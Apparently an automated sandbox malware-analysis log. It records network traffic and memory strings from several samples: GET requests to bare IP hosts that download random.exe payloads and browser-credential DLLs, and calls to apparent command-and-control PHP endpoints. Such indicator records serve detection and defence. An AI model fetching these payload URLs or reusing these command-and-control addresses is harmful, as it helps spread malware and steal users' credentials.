Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 05:07:27 GMTIf-None-Match: "6732e28f-1bb600"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log6.8.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log6.8.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log6.8.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic	DNS traffic detected: DNS query: r.msftstatic.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 912sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe78
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeQ
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe0
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe1395d7f
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeW
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0?P
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll38
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllE8
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllJ6%
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllW8
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllK8
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dlle7
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllRS
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/8
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/D
Source: file.exe, 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2571406052.00000000232B2000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000171B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.h
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/$
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Yk
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/l
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/s
Source: file.exe, 00000000.00000002.2546281725.0000000000606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php003
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:k
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpFh
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpWk
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpY
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpb
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpbh
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpows
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp#Xl
Source: file.exe, 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpq
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpvh
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
Source: file.exe, 00000000.00000002.2571406052.00000000232B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ockedCacheCounterMutex
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/sonation
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/u
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/urrentVersion
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206C
Source: file.exe, 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206T
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206UC
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid1
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7001
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpM
